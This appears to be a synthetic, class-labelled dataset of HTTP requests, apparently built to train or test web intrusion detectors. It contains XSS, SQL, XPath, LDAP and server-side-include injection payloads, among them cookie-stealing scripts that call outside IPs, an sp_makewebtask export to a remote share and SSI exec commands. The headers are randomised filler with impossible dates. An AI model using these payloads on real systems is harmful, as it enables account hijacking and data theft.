If-Range: "s2rYQGeCZO1BCrt"
Max-Forwards: 9140
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: Basic bmxhaWtFZmc6dG5iZ25kbw==
Range: 3837-2
Referer: /fEaalD/gdos/aE4mrrva.mdb
TE: gzip,trailers,deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/2.1 (Windows; U; WinNT 0.4; nj-32; rv:0.3.5) Gecko/90234036
UA-CPU: 68000
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: 2.7 www.satyol.shtml, ninng/7.3 2.16.14.183, 4.7 www.5us8s.js
Transfer-Encoding: gzip
Upgrade: DUyx4/6.1, udlo5/7.2
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 97.134.190.82
X-Serial-Number: 698729021
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48018
Start - Id: 49360
class: XPathInjection
GET /8HaLkINbe_BH/jtmrhetiunmrftRiost/Qcopydeletercp9X.C2/dtrdni0s/G1bnczVHCS/b-0aSWRf901Kpasswd.png?oe=wy&d7d9Hl=01151&rserLe=tre7a%26gacxlrto&ace2s=tumLtCe2utI&rohnnncetu=gelSrr&tsi=53221994&H.@cm=od6pocb+t&lih0iupdstx7=15412542&teset=524098&lhifg2ipeoelN=passthru&ieyl050o=1+or+++++r%2Fw8hla%2Finall%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D141%5D+++++or+++22073%3D HTTP/1.1
Host: www.ofis3.de
Connection: doxnrm
Accept: image/jpeg;q=0.7, application/postscript;q=0.4, audio/*;q=0.5
Accept-Charset: koi8-r;q=0.7, x-mac-roman, x-mac-arabic, euc-tw;q=0.1
Accept-Encoding: 
Accept-Language: cwlaxoa-qhnN, ilwoccoe-tbif;q=0.5
Cache-Control: max-stale
Client-ip: 30.6.154.223
Cookie: gDsomtaf=Yti;H8l9pl3nehe=~nhrnm+boaio;wrceosw=17185
Cookie2: $Version="771"
Date: Wed, 30 Jan 08 24:49:40 UTC
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Wed, 15 Jul 09 16:29:32 CET
If-Match: *
If-None-Match: "5.m4rxB5kaygeDde_"
If-Range: Tue, 09 Aug 05 06:09:21 GMT
Max-Forwards: 059
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: Basic MHJydjplMWFU
Range: 896-
Referer: /zOmeiHrO/sliMo.tar
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.6 (compatible; MSIE 2.1; Open BSD i386; xqahtey; otatost)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 396x142
Via: FTP/5.5 www.uwoudy.htm:009, aa4/3.4 198.238.9.212:4, 8.7 11.229.65.94
Transfer-Encoding: gzip
Upgrade: eens/3.9, nsloG/2.4, fad/4.2, efvt/2.8
Warning: 652 www.nylcr.tiff "iphresmanuhdbtxo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49360
Start - Id: 37147
class: LdapInjection
GET /eepNOnnrlceil/eE5nbuBi/Q3scripth3MydVl/FGHsokbgsound_Cecixp_D7/beywra02.php?0ltedrdbtmr=ilwulqdwcey&eAiuoTyuzqVz=2029751282&ajsnnheurtehr=%29++++%28++++%7C+%28aqUbs%3Dam*%29&uuesw2p=he&ullqtanf7dh2cU=idrrawkrlE&oOtlohoB=%3F HTTP/1.1
Host: www.NwBy.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: Eac3gwEe-e4, i6ETUi-72fctrh;q=0.4, 8-fbi
Cache-Control: An=I
Client-ip: 186.207.13.158
Cookie: TPjZ=2
Cookie2: $Version="12"
Date: Wed, 04 Jan 06 02:17:24 GMT
ETag: W/"RxU5d45Z4IV2969"
Expect: 100-continue
From: tiriuma2@nheraeb.net
If-Modified-Since: Wed, 12 May 04 16:36:10 UTC
If-Unmodified-Since: Fri, 01 Aug 08 04:43:17 UTC
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: "fvICtzELXv1aqfuA"
If-Range: Wed, 13 Jun 07 10:00:49 GMT
Max-Forwards: 993
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: tRyn7 ltusgv4=ec82A
Range: 88347-,9-
Referer: http://e9029.fr/oou8Dva/rnryt/Wuf1bx1.php3
TE: trailers
Trailer: Accept-Language
User-Agent: te93nnnr
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: Tl4be/0.9 www.i5fle.gif:784
Transfer-Encoding: identity
Upgrade: rn2ata/5.1
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 46.83.73.112
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37147
Start - Id: 49592
class: XPathInjection
GET /gg1esj21amtpIatt/e_cKmzevi4hgN8QXPq9R/hSHeAHELY/tFsISd9pkerFC/39u/qsEAWovBz9/nknzUKjyAd/hSAjli0wnoE/ogsAf/eIvEizellfrhs/go/zsCfa5glNnEqzn9o.asp?iom=88&scagfiagwuoia=806&Tboecsox2caor5w=01515&eirRds=uiM%27+++++or+++1%3C++++pekd1%2Fs%2F3t%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D++or+++++%27senbmu%27++%3D+%27 HTTP/1.1
Host: www.tqiftart.de
Connection: EnUl
Accept: video/quicktime;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 132.114.34.1
Cookie: cD=union;aWSJem=177
Cookie2: $Version="81"
Date: Mon, 05 Sep 05 03:07:49 UTC
ETag: W/"RZdAP6_vcqBMbAH1b"
Expect: 100-continue
From: rmya@typuTon9h.uk
If-Modified-Since: Wed, 14 Oct 09 22:41:20 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "yuUsyu_rHXkxVVf12F"
If-None-Match: *
If-Range: Thu, 17 Apr 08 09:13:02 GMT
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: NTLM aG90OXJtMW1nYnRwaWFvZWE4c2dsc3B0Z2kzZWl1dWVyb2NtdGlyNGw=
Range: 124-314534,89-
Referer: http://www.icl7f.cz/In5ssEe/rhrkre.asmx
TE: deflate;q=0.8,chunked;q=0.4
Trailer: If-Range
User-Agent: Ofai/7.8.3
UA-CPU: StrongARM
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: 4.2 www.ovleaorU.htm:327, HTTP/6.3 www.Yz9t.shtml
Transfer-Encoding: identity
Upgrade: iasi6m/1.5, ep9/4.9, ip9nui/4.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49592
Start - Id: 47834
class: XSS
GET /RDpgyMnlssUGw/eeow4i1eaudcwm/lnHwutkFh1TNZVK0Tf_/j0i@AbEKznUnpMLtQsqW/hNYreplace/easlltbogmispoahTv/revG_m.swf?nee=Es0cmdnph-dnvar&som8te=%3Cmeta+++++http-equiv+++%3D+++%22+refresh+++++%22+content++++%3D+%22++++0%3Burl%3Djavascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F139.210.122.73%2Froet.swf%27%2Bdocument.cookie%29%3B%5D+%22+%3E&ethygyeaDbo=h9Zm&ruj=5058536&csYT=%3Fi7DooswraT0d%2Bli HTTP/1.1
Host: www.iadide9u.it
Connection: s6Eu5i
Accept: video/*
Accept-Charset: iso-8859-4, windows-1253
Accept-Encoding: *;q=0.9
Accept-Language: dc87nia-hie7sW;q=0.1, 4an-irvwcst, lawoo4-egmgAE
Cache-Control: no-store
Client-ip: 145.49.48.15
Cookie: 0n=1148209;lTamntl3dt=tPptL1vD;cgEenhdde7o35u=nute9Aul;Thknecgt=1933
Date: Sun, 19 Jun 05 23:04:03 UTC
Expect: ouzt
If-Modified-Since: Fri, 10 Mar 06 11:22:11 GMT
If-Unmodified-Since: Mon, 19 Apr 04 13:39:31 GMT
Max-Forwards: 4899
Proxy-Authorization: NTLM TDNybjkwYkRubGFlcWlucmU0c2F0ZWNudmd1dHVvbnNzQ1dtenNoZDNtc2U=
Authorization: sb51Ce rd2eo=uobarn
Referer: http://erih.uk/ldfs.cfm
User-Agent: teiu8nbm/1.6
Via: Edun/6.1 www.o40gondl.js:139, 3.1 www.TgTh.css
Transfer-Encoding: deflate

null

End - Id: 47834
Start - Id: 49367
class: XPathInjection
GET /tDCyrmt/dBmGjVC.j8m/e5p3eqdPZ1O5.aspx?l5=ta%27++++or+++++ieBf%2Fssmi1i%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D15%5D+++++or++%27dt7srno%27+++%3D%27 HTTP/1.1
Host: 50.215.169.154:80
Connection: keep-alive
Accept: audio/*;q=0.3, video/quicktime;q=0.9, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: csd-oHrg, yu1vHhcn-mnhrBRo, tsepdrdo-Hi, x4-muadcjn;q=0.8
Cache-Control: no-store
Client-ip: 204.180.12.252
Cookie: IHeeegnUeXdrt=399919;9@QOautoexecLI=edHl|tcuz%a;aGtalcutpOYTee5=<miwH;teddN=o-W2Ia_y1n;opp5m5wschFmdsh=9ireooeeRs0dAgot
Cookie2: $Version="93"
Date: Sat, 17 Sep 05 16:28:28 UTC
ETag: "gRqaxicCjKmiIeMRRJ"
Expect: Tuxyl=nqqhaaen;tyEptn=rc4e
From: deodan@edhI.net
If-Modified-Since: Sun, 28 Aug 05 09:49:31 UTC
If-Unmodified-Since: Wed, 05 Aug 09 14:47:29 CET
If-Match: *
If-None-Match: *
If-Range: "qIXiOEH1Or1mVYrI"
Max-Forwards: 3844
MIME-Version: 7.0
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: Digest response="B78BfCe2EEBf82B7C940d290C7C9afAB"
Range: -9178,535260-09009
Referer: http://2lia.be/lstYTeru.avi
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: Mozilla/5.5 (compatible; wiSt; Solaris; ttaEo; euaa; qleX65eoty)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3843x971
Via: 0.2 www.BrELlent.shtml, HTTP/9.2 www.euopqaer.js:5, 0.8 183.22.176.39
Transfer-Encoding: compress
Upgrade: fdzt6r/1.6, f4eN8/7.9
Warning: 096 www.ehhi.js "ryQ5hore2nr" "Mon, 29 Sep 08 20:16:29 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49367
Start - Id: 42457
class: SqlInjection
GET /mKOdlNPKDRu5j2J/2SuZlFnC@/vL8VnIV9.0IhclmmL.R/iwjYZUDtzxs4VsB6OPH/r@NknooH3Pe8Q5rmIH/heonhnouEayaSegn/YXe/oFvvD-w..php?sO2eott=ts8iss&ostf6pUa=7471213&nejodtn=2477&tew4eNrh2hk=8155440&AssEm=lk7&VmgUd@=xterm%3EOorautoexecl%24pbe&aihlejmA1rh5aA=bpega%27+UNION++++%2F**%2F+SELECT++++etiOLhla+++++FROM++++dba_users+++++WHERE+d89++++like+%27%2525&oD1yd=687597&le3ykthu=15625183 HTTP/1.1
Host: 106.46.212.135
Connection: close
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 13.69.56.93
Cookie: aeo=856;neqrmy=23650;ZNesrelhiv=e;ZGLIPD1ZJ=Tcenrsortdige
Cookie2: $Version="3"
Date: Tue, 15 Jul 08 01:10:02 GMT
ETag: "qpEgOLwaqcuuIaJS0f8"
Expect: 100-continue
From: Oselc@mtgpaa.net
If-Modified-Since: Sun, 19 Sep 04 03:50:54 CET
If-Unmodified-Since: Sat, 04 Nov 06 19:57:21 CET
If-Match: *
If-None-Match: ".FS959iE-.JQYRtFU99"
If-Range: Sun, 09 Aug 09 16:02:54 UTC
Max-Forwards: 860
MIME-Version: 0.2
Pragma: tit=3ra
Proxy-Authorization: Basic c2dtYTpzTmtOdHNw
Authorization: Basic ZmU2b3NpZW46bmJwdDdlMw==
Range: -9
Referer: /a1hSH/rea5oad/2c0k/hha2/aEiinNne.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (X11; U; Solaris 8.6; sf-iu; rv:6.1.5) Gecko/49451799
UA-CPU: 68000
UA-Disp: 3357,1870,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: HTTP/5.6 3.161.139.143
Transfer-Encoding: compress
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 574567754776356
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42457
Start - Id: 39480
class: SSI
POST /iRajhnmjN7g.dll? HTTP/1.1
Content-Length: 189
Content-Encoding: compress
Content-Location: http://www.etplqor.cz/s3H4/1otzneie.exe
Content-MD5: bm1iYWFzckVzZHVlNXJnYQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 05 Feb 07 18:13:06 CET
Host: 125.24.49.38
Connection: keep-alive
Accept: audio/*, application/*, audio/*;q=0.9
Accept-Charset: windows-1252, euc-kr, koi8-r, euc-kr;q=0.5
Accept-Encoding: identity, compress;q=0.2, compress, deflate, deflate;q=0.8
Accept-Language: <!--    #exec     cgi="/cgi-bin/script?lo73tgmou"    -->
Cookie2: $Version="641"
Date: Thu, 21 Jan 10 03:34:53 UTC
Expect: pbji=n6iSrxEn
If-Modified-Since: Tue, 03 May 05 23:34:23 UTC
If-None-Match: *
Max-Forwards: 943
Pragma: dsyjet='uo'
Authorization: Digest nc=6Cc08f8F
Referer: http://www.siata.org/ceLgtq3.cfm
User-Agent: tmP8I7Us http://www.Dnizu33m.be
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kChWacceptSe5dvKf=9600938671&ZYbfD=tliGne&rpsee6st=041854&i.01=;-fd;&dkCibane7n4=go eh5c4s+inwp-wr0&lcoahne=ia68onteoDv3u&iaaassjtncg=94696719&eiu0n7n=5279559&a59=fromcE2dIt&ut=856844

End - Id: 39480
Start - Id: 35038
class: SqlInjection
GET /sOrg7XWXTck8Ck/eretbtiebc/e2ptwsrrh3oih/eVu2vei8gA/tXibejshw2/lXNBVoEqftpoptDincludecmdyx/JA.mdb?9EaQNI7RjxmlWI=ent4&sphse2=%27%3B++++EXEC+++master..sp_makewebtask+++++%22%5C%5C15.159.250.195%5CeieA%5CiNhrl.html%22%2C+%22SELECT+++++*++++FROM+++INFORMATION_SCHEMA.TABLES%22&rzetliyrl=250&onp4lu=y%3Ftlr&xetccTQXMH.cL=l6&clnadIhustu=1694548280 HTTP/1.0
Host: www.s1pTr.fr
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: shift_jis
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 70.74.68.114
Cookie: -StjRnAXMglL=4976008343;ottesegzt=288487;bformHHgbFwNIRbetween=location0&
Date: Wed, 01 Feb 06 23:10:58 GMT
ETag: W/"0@NBRWxhqqgere4xA"
If-Modified-Since: Thu, 10 Aug 06 08:43:56 GMT
If-Unmodified-Since: Fri, 09 Mar 07 14:39:09 UTC
If-Match: "pqyLo..u@gR_YOMkbEjm"
If-None-Match: *
If-Range: *
Max-Forwards: 124
Pragma: 9a=eeie4
Authorization: Basic dXRrY3JlOXI6M3RuZm1mdE4=
Referer: http://oisrlsgs.de/aassdg2/9ennn.nsf
TE: trailers
User-Agent: hataeosva/5.2.0.6.3
UA-CPU: PowerPC
UA-Color: color8
Via: 6.4 www.nacffhNz.htm:6
Transfer-Encoding: mtiugs; 0nfw8g=serem
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35038
Start - Id: 46472
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.0
Host: 215.221.235.115:06
Connection: idenen
Accept: image/jpeg, image/*;q=0.2, video/quicktime
Accept-Charset: x-mac-ce
Accept-Encoding: gzip
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 209.77.63.143
Cookie: balnrcbnsh=fhkcEgvW2
Cookie2: $Version="2"
Date: Fri, 04 Apr 08 15:59:49 CET
ETag: "TClpSRyVRpjXpah"
Expect: ufTim
From: oeed@ro5sY.uk
If-Modified-Since: Wed, 07 Apr 10 16:36:08 UTC
If-Unmodified-Since: Mon, 14 Jul 08 21:50:10 CET
If-Match: *
If-None-Match: "KelgZwzD12KEShLkLB5"
If-Range: "EHImig7PXy59Qtju"
Max-Forwards: 939
Pragma: yr7s=lslO
Proxy-Authorization: Digest cnonce="eAenecin"
Authorization: ezmfH nonhs4ah=loigeTl0
Range: -540
Referer: /pvijtk/la1eSgpi/Drsnaht.jpg
TE: trailers,gzip
User-Agent: rlfmofseirvi
UA-Disp: 133,558,32
UA-OS: Linux
UA-Pixels: 920x981
Via: ela/4.6 175.235.33.7
Transfer-Encoding: deflate
Upgrade: fyos/6.8, iroag/5.4, 3rX/2.7, eCy/4.0, vUar/8.3

null

End - Id: 46472
Start - Id: 46855
class: XSS
PUT /4TSwSj-HJQ8We/l7nevneefsmos2nimoi/eia4ab/a1eW8/lx2pul3/yyGODQZEXpzRCQNQui2/nQ0nVk/8AYuiJ3u1RF/NuCLGwaccepty/xteAeiis/a.fDFZvT-/seiaihs1.dll? HTTP/1.1
Content-Length: 334
Content-Language: c,rhi,msem
Content-Encoding: deflate
Content-Location: /avAa1n/zsemepA.bin
Content-MD5: YWV1cnQ4dHR0ZWlvaGVkcA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 08:10:49 GMT
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: 186.28.196.62:2
Connection: keep-alive
Accept: application/x-tar;q=0.7, application/postscript, video/mpeg;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 116.169.8.10
Cookie: i8whe=9262271130;rhttqp8ekioiii=909946;ia3auhsEt=3tTs4 
Cookie2: $Version="134"
Date: Fri, 28 Oct 05 22:42:39 GMT
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: eounOo
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Sun, 26 Aug 07 12:54:17 GMT
If-Unmodified-Since: Sun, 02 Nov 08 07:43:06 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Aug 09 04:58:36 CET
Max-Forwards: 35
MIME-Version: 2.6
Pragma: khw=tsIeg
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZW9sSG86dHVvYWE=
Range: 11334-,-933
Referer: http://www.neSe.org/rcliliio/houba/325ecO.pl
TE: gzip,trailers
Trailer: Referer
User-Agent: do7bdm (hv9pdlt1)
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 758x384
Via: 8.4 108.98.40.193, 9tei25/4.2 95.32.248.29:3614
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-e_M=4294&EohN.7EGS=window.open&EC3TbyM=unaLgk0DAs&s8r22i=+tn )irodrop&2u=smiv&rez5znxdlhe9t=81030&DOn3=yg&en0eqkaAiri=M2sH&6e5zues=<meta     http-equiv   ="refresh     "   content   =   "    0;url=javascript:   [window.open('http://157.211.175.67/teesan.mspx'+document.cookie);]   ">

End - Id: 46855
Start - Id: 40250
class: SSI
POST /nd6yXZf3p/neAu/hIUpp2v6-.shtml? HTTP/1.0
Content-Length: 364
Content-Language: std,eelnlDsh,r
Content-Encoding: deflate
Content-Location: http://ne5mEm.cz/gTvtowt/sidr/inBsa/osoidt.png
Content-MD5: Y1JBMzVHbG9hZWVuTmVwOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Oct 06 05:40:20 GMT
Last-Modified: Tue, 06 Sep 05 05:10:43 UTC
Host: 94.195.178.82
Connection: keep-alive
Accept: video/quicktime;q=0.1, text/plain
Accept-Charset: *;q=0.4
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: cseNer='nsWs1'
Client-ip: 209.173.103.43
Cookie2: $Version="42"
Date: Fri, 03 Oct 08 15:54:38 GMT
ETag: W/"Elsc.@Ma@beA1M38is"
Expect: 4tksenn1=dexsrl4s;caevs=w60etc
From: YHtcdN@wRae.uk
If-Modified-Since: Tue, 24 Aug 04 02:25:28 UTC
If-Unmodified-Since: Thu, 24 Mar 05 01:21:12 GMT
If-Match: *
If-Range: "YpKTyoxuyfSrntn_t"
Max-Forwards: 655
Pragma: van='8aTIn'
Proxy-Authorization: Basic b3FoYW56ems6OTdpbG8=
Authorization: NTLM MnJtUzd5ZUlpYnVrMGRjYW1hc1JvT2VlZXBvb25tdGlpZHJhdA==
Referer: /y3ce3/htyabnE.png
TE: trailers
User-Agent: 8c4lyc (7f-7C3m3K-; eDPtTK7Ua)
UA-Disp: 0036,0245,32
Via: tNerx/8.0 127.242.220.25, HTTP/3.7 www.idnn.jpeg
Transfer-Encoding: compress
----: --------------------

h3rotglgsrmta=n0les&vJme7ue=ti&uetTdok8halom0=et<ni=cedib<hiic@hechoh&neitcm9t=974781&llphhabonRhcrn=0763103&es0aced5h=uho7t8rfir2o4nps&4dQuetcgkDwpEY=83&mietpai=jnea&Ie0s4YdtsN=eAChiuacmDisrx&Tiwz_=<!--  #exec  cmd="c:\progra~1\ste3e\8Iwpesanjo\nuve.exe d:\s9\www.elatsi.org\tQ\database.mdb     /x  exporttofoxpro"-->

End - Id: 40250
Start - Id: 40923
class: SSI
GET /iB8ZJFYG9ga_d4cODz-.jpg?gMariahsue6oi=owhi&bepOitiDjnvlht=in28RlwaIQMx&eorrr=ridoqVHIIcI5&kPWaPzp.IDys=6&oUyqTpeeestcre=yjvbeHrDierieah&qfwo5o=%3C%21--+++%23odbc++++statement++++%3D+++%22select++lcrrs69%2C++tea%2C+++++hlehss+from+ia2atmG++++order++++by+++6%2C++++14%2C+6%22+++--%3E&I61lnseh7soafu=a+he&aoihn=8546&spctxPle8=4280216&EgZp=ewiohfRe%3E&doispertr=59&4MwYeo=ri&rt=z+h&ildeprkte=otn9%7Cne%5Cphpn%2Bi%3Aer0 HTTP/1.1
Host: 12.189.161.100:80
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.4, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 164.186.250.7
Cookie: t6=rci;N2rG=2588075
Cookie2: $Version="5"
Date: Tue, 13 Apr 10 17:37:10 UTC
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: nBhmshg
From: tmenra3@rdaoespvt.it
If-Modified-Since: Wed, 18 Apr 07 06:18:05 GMT
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Oct 04 15:11:14 GMT
Max-Forwards: 32
MIME-Version: 7.5
Pragma: oiWU9='C7lk'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: 56699-901828,6-1585
Referer: http://www.shq5Vy.net/i8nsqts/enpig.rar
TE: chunked;q=0.8
Trailer: Accept
User-Agent: f20VkGl@ http://www.eaeinnn.it
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Linux
UA-Color: color16
Via: 3.4 www.o3aeo7p.css
Transfer-Encoding: rkotm
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40923
Start - Id: 40740
class: SSI
GET /93_mL_Mobjectt62dxhw/sHFa/e1QG3g19QwYG/BTaEr0dl/au/utnjlehnts9rxYs/eo/h@bzU4wF7N.w7mtYPk/zFQMbFln/nmhsidtinvEagty/sv.html?eG3=q66KEB9mAw9B&9celhat=oj%27&8seTd4gIigu=y9&0e6eowtgres=p0XV.I0Q&mngfhh=4t45loctLUcirun&rnhedon=tMsv&nzetnsonrhidy=eeaHlOmstjnrmeushf&ourNusftiDes=d1fROLRB&o3e4k=f25eeaci&tIMg=7421&uIix2e=1&eernms=wsnr HTTP/1.1
Host: 43.186.207.250
Connection: close
Accept: audio/x-wav, application/rtf;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: 9aeeEXid='lieoSri'
Client-ip: 13.251.33.175
Cookie: 7ewpaweelgztmr=nVolanannUfdnme;fte=55;gkll=an\4a;xae=<!-- #odbc connect="gm,losrt,osarD"     statement="select    *  from     dig8"-->;ytssg=tp5y;yhe=2277654384
Cookie2: $Version="7"
Date: Wed, 08 Jul 09 10:15:38 UTC
ETag: W/"W2NqnoUK3PXtPiQAyM7l"
From: rgbe@Iedo.it
If-Modified-Since: Mon, 12 Apr 04 10:59:52 CET
If-Unmodified-Since: Fri, 31 Jul 09 04:45:28 UTC
If-Match: "KUo9h6hk71@41.l"
If-None-Match: *
If-Range: *
Max-Forwards: 295
MIME-Version: 9.1
Pragma: as8o=edxe
Proxy-Authorization: NTLM TkVSdHVpcm9hNnRobnMzbXFpc3RhbGMzZWFwaXJockZlcnV5a0hyZQ==
Authorization: Digest realm
Range: -353,077-4260
Referer: /a6sveK/2wowbl.asmx
TE: chunked;q=0.6,trailers
Trailer: If-Range
User-Agent: Mozilla/9.3 (Windows; U; WinNT 9.5; s8-is; rv:9.1.7) Gecko/23972764
UA-Pixels: 2291x8595
Via: 0.5 111.246.227.93
Transfer-Encoding: g4esu
X-Forwarded-For: 108.82.12.144
X-Serial-Number: 57003

null

End - Id: 40740
Start - Id: 46985
class: XSS
GET /neeMH8/nletkrens3sdeifuua/esaDnUraigs/hZel/stacs5ttedsan.shtml?xrnce=0kl%3Da7unionvhc&rzh3lj7Idmt=exIhaREgC&olod5ssbeautMr=rsbruhifeynit&oigNc2oelrsfgl=%3Cobject++classid++%3D%22++clsid%3A...++%22++codebase%3D++%22javascript%3A++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.verigema.com%2Fcgi-bin%2Fro.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&8e=172395&ez=Hrn HTTP/1.0
Host: 246.126.60.46
Connection: nauxT
Accept: video/quicktime;q=0.5, video/*;q=0.3, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: FmhW-aa;q=0.7, te-h8debe, kIztue-1dlpe, t-wi;q=0.5
Cache-Control: no-store
Client-ip: 173.101.193.171
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Sat, 20 Nov 04 24:49:06 GMT
ETag: W/"Buq@whtrMtHZH-Bk7Zb"
Expect: 100-continue
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 25 Sep 06 19:21:45 CET
If-Unmodified-Since: Mon, 12 May 08 04:52:15 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Jun 09 08:56:48 GMT
Max-Forwards: 4
MIME-Version: 8.6
Pragma: 0ha=1m
Proxy-Authorization: Digest realm
Authorization: Basic U2VsdGw6aWxlcmVZ
Range: 5-22964
Referer: /s8hej/neddNA/acecsENN/yjntift.jsp
TE: gzip,trailers,gzip
Trailer: Range
User-Agent: Mozilla/8.6 (compatible; weybmtNrq; Win 9x; anigier; lljldtidzr; EhoiAr99he)
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 199x2885
Via: HTTP/3.6 www.hYbvu.tiff, sel/7.6 159.246.100.101
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46985
Start - Id: 37925
class: LdapInjection
